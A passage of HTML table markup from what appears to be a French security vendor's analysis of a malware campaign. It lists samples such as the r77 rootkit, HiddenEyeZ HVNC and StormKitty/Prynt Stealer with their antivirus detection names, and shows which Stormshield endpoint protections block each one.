rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan:MSILZilla\/8938<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5661301\" class=\"desktop-view tr_class_5661301 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_19884910\" rowspan=\"1\" colspan=\"1\" class=\"td_class_19884910\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_19884910\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">highlander.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61589106\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61589106\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61589106\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Variant:Marsilia\/20527.1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8792755\" class=\"desktop-view tr_class_8792755 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_55621856\" rowspan=\"1\" colspan=\"1\" class=\"td_class_55621856\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_55621856\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 - installer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_14225607\" rowspan=\"1\" colspan=\"1\" class=\"td_class_14225607\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_14225607\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Variant:MSILHeracles\/32317<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5090304\" class=\"desktop-view tr_class_5090304 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_48953366\" rowspan=\"1\" colspan=\"1\" class=\"td_class_48953366\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_48953366\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 - dll x86<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_50627880\" rowspan=\"1\" colspan=\"1\" class=\"td_class_50627880\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_50627880\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Variant:Cerbu\/99363<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7446039\" class=\"desktop-view tr_class_7446039 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_82038898\" rowspan=\"1\" colspan=\"1\" class=\"td_class_82038898\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_82038898\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 - dll x64<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_64816237\" rowspan=\"1\" colspan=\"1\" class=\"td_class_64816237\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_64816237\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan:GenericKD\/65601994<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2532925\" class=\"desktop-view tr_class_2532925 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_38924596\" rowspan=\"1\" colspan=\"1\" class=\"td_class_38924596\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_38924596\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 - uninstaller<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_97253485\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97253485\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97253485\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">SUSPECT<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7375139\" class=\"desktop-view tr_class_7375139 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_18866327\" rowspan=\"1\" colspan=\"1\" class=\"td_class_18866327\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_18866327\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">AddStartupTask.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_52803865\" rowspan=\"1\" colspan=\"1\" class=\"td_class_52803865\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_52803865\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Variant:Razy\/592822<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5078776\" class=\"desktop-view tr_class_5078776 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_50342371\" rowspan=\"1\" colspan=\"1\" class=\"td_class_50342371\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_50342371\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">StormKitty \/ Prynt Stealer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66090308\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66090308\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66090308\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan:MSILZilla\/24027<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Les protections Stormshield Endpoint Security Evolution<\/h3>\n<p>Voici pour chaque ex\u00e9cutable analys\u00e9, les protections apport\u00e9es par Stormshield Endpoint Securtity Evolution (SES).[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_12\"\n     id='ninja_table_builder_414258'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_12\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414258\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6655394\" class=\"desktop-view tr_class_6655394 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_30972753\" rowspan=\"1\" colspan=\"1\" class=\"td_class_30972753\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_30972753\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_56260162\" rowspan=\"1\" colspan=\"1\" class=\"td_class_56260162\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_56260162\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Rules set<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_20503072\" rowspan=\"1\" colspan=\"1\" class=\"td_class_20503072\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_20503072\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Protection<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3028415\" class=\"desktop-view tr_class_3028415 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_16603208\" rowspan=\"1\" colspan=\"1\" class=\"td_class_16603208\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_16603208\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Dropper de HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_94527499\" rowspan=\"1\" colspan=\"1\" class=\"td_class_94527499\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_94527499\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Baseline protection<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_29333972\" rowspan=\"1\" colspan=\"1\" class=\"td_class_29333972\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_29333972\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Blocking the execution<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3698383\" class=\"desktop-view tr_class_3698383 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_51053142\" rowspan=\"1\" colspan=\"1\" class=\"td_class_51053142\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_51053142\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">StormKitty \/ Prynt Stealer<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_28159375\" rowspan=\"1\" colspan=\"1\" class=\"td_class_28159375\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_28159375\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Data Leak Prevention<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_79705227\" rowspan=\"1\" colspan=\"1\" class=\"td_class_79705227\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_79705227\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Blocking the recovery of protected sensitive data<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6608838\" class=\"desktop-view tr_class_6608838 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_56412718\" rowspan=\"1\" colspan=\"1\" class=\"td_class_56412718\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_56412718\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_21700656\" rowspan=\"1\" colspan=\"1\" class=\"td_class_21700656\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_21700656\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\"> <\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_51304453\" rowspan=\"1\" colspan=\"1\" class=\"td_class_51304453\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_51304453\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No blocking without explicit action by the attacker<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2533852\" class=\"desktop-view tr_class_2533852 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_29374614\" rowspan=\"1\" colspan=\"1\" class=\"td_class_29374614\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_29374614\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Installer r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_72183396\" rowspan=\"1\" colspan=\"1\" class=\"td_class_72183396\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_72183396\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Baseline protection<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_65156463\" rowspan=\"1\" colspan=\"1\" class=\"td_class_65156463\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_65156463\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Blocking the execution<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7254115\" class=\"desktop-view tr_class_7254115 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_67602848\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67602848\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67602848\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Uninstall r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_50095415\" rowspan=\"1\" colspan=\"1\" class=\"td_class_50095415\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_50095415\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Baseline protection<\/span> 